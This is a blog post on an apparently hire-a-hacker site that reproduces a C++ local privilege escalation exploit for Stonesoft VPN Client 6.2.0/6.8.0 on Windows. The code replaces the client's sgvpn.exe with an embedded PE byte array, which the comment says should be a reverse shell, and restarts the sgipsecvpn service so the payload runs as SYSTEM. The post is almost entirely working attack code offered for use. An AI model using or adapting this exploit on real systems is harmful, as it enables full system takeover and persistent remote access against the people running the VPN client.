Jump to content

Hacker Technology

A group blog by Leader in Hacker Website - Providing Professional Ethical Hacking Services

  • Entries

    16114

  • Comments

    7952

  • Views

    86372816

Contributors to this blog

  • HireHackking 16114

About this blog

Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.

HireHackking 
# Exploit Title: Stonesoft VPN Client 6.2.0 / 6.8.0 - Local Privilege Escalation 
# Exploit Author : TOUHAMI KASBAOUI
# Vendor Homepage : https://www.forcepoint.com/ 
# Software: Stonesoft VPN Windows
# Version : 6.2.0 / 6.8.0
# Tested on : Windows 10
# CVE : N/A
#Description local privilege escalation vertical from Administrator to NT AUTHORITY / SYSTEM

#define UNICODE
#define _UNICODE
#include <Windows.h>
#include <iostream>

using namespace std;
enum Result
{
    unknown,
    serviceManager_AccessDenied,
    serviceManager_DatabaseDoesNotExist,
    service_AccessDenied,
    service_InvalidServiceManagerHandle,
    service_InvalidServiceName,
    service_DoesNotExist,
    service_Exist
};

Result ServiceExists(const std::wstring& serviceName)
{
    Result r = unknown;

    SC_HANDLE manager = OpenSCManager(NULL, SERVICES_ACTIVE_DATABASE, GENERIC_READ);

    if (manager == NULL)
    {
        DWORD lastError = GetLastError();

        if (lastError == ERROR_ACCESS_DENIED)
            return serviceManager_AccessDenied;
        else if (lastError == ERROR_DATABASE_DOES_NOT_EXIST)
            return serviceManager_DatabaseDoesNotExist;
        else
            return unknown;
    }

    SC_HANDLE service = OpenService(manager, serviceName.c_str(), GENERIC_READ);

    if (service == NULL)
    {
        DWORD error = GetLastError();

        if (error == ERROR_ACCESS_DENIED)
            r = service_AccessDenied;
        else if (error == ERROR_INVALID_HANDLE)
            r = service_InvalidServiceManagerHandle;
        else if (error == ERROR_INVALID_NAME)
            r = service_InvalidServiceName;
        else if (error == ERROR_SERVICE_DOES_NOT_EXIST)
            r = service_DoesNotExist;
        else
            r = unknown;
    }
    else
        r = service_Exist;

    if (service != NULL)
        CloseServiceHandle(service);

    if (manager != NULL)
        CloseServiceHandle(manager);

    return r;
}

bool ChangeName() {
    LPCWSTR parrentvpnfilename = L"C:\\Program Files (x86)\\Forcepoint\\Stonesoft VPN Client\\sgvpn.exe";
    LPCWSTR newName = L"C:\\Program Files (x86)\\Forcepoint\\Stonesoft VPN Client\\sgvpn_old.exe";
    bool success = MoveFile(parrentvpnfilename, newName);
    if (success) {
        cerr << "[+] SVGVPN filename changed.\n";
    }
    else {
        cerr << "Failed to rename file \n";
    }
    return 0;
}

int main() {

    const uint8_t shellcode[7168] = {
        0x4D, 0x5A, 0x90, 0x00, 0x03, 0x00, 0x00, 0x00, 0x04, 0x00, 0x00, 0x00, 0xFF, 0xFF, 0x00, 0x00,
        0xB8, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x40, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
    }; //You can set array bin of your reverse shell PE file here

    std::wstring serviceName = L"sgipsecvpn";
    Result result = ServiceExists(serviceName);
    if (result == service_Exist)
        std::wcout << L"The VPN service '" << serviceName << "' exists." << std::endl;
    else if (result == service_DoesNotExist)
        std::wcout << L"The service '" << serviceName << "' does not exist." << std::endl;
    else
        std::wcout << L"An error has occurred, and it could not be determined whether the service '" << serviceName << "' exists or not." << std::endl;
    ChangeName();
    HANDLE fileHandle = CreateFile(L"C:\\Program Files (x86)\\Forcepoint\\Stonesoft VPN Client\\sgvpn.exe", GENERIC_WRITE, 0, NULL, CREATE_ALWAYS, FILE_ATTRIBUTE_NORMAL, NULL);
    cerr << "[*] Loading Malicious file into main PE of Forcepoint Installer \n";
    if (fileHandle == INVALID_HANDLE_VALUE) {
        cerr << "Failed to create shellcode\n";
        return 1;
    }

    DWORD bytesWritten;
    if (!WriteFile(fileHandle, shellcode, sizeof(shellcode), &bytesWritten, NULL)) {
        cerr << "Failed to write to file\n";
        CloseHandle(fileHandle);
        return 1;
    }
    CloseHandle(fileHandle);

    cout << "[+] Payload exported to ForcePointVPN \n";
    Sleep(30);
    cout << "[+] Restart ForcePointVPN Service \n";
    SC_HANDLE scmHandle = OpenSCManager(NULL, NULL, SC_MANAGER_ALL_ACCESS);
    SC_HANDLE serviceHandle = OpenService(scmHandle, TEXT("sgipsecvpn"), SERVICE_ALL_ACCESS);

    SERVICE_STATUS serviceStatus;
    QueryServiceStatus(serviceHandle, &serviceStatus);
    if (serviceStatus.dwCurrentState == SERVICE_RUNNING) {
        ControlService(serviceHandle, SERVICE_CONTROL_STOP, &serviceStatus);
        while (serviceStatus.dwCurrentState != SERVICE_STOPPED) {
            QueryServiceStatus(serviceHandle, &serviceStatus);
            Sleep(1000);
        }
    }
    StartService(serviceHandle, NULL, NULL);

    CloseServiceHandle(serviceHandle);
    CloseServiceHandle(scmHandle);

    return 0;
}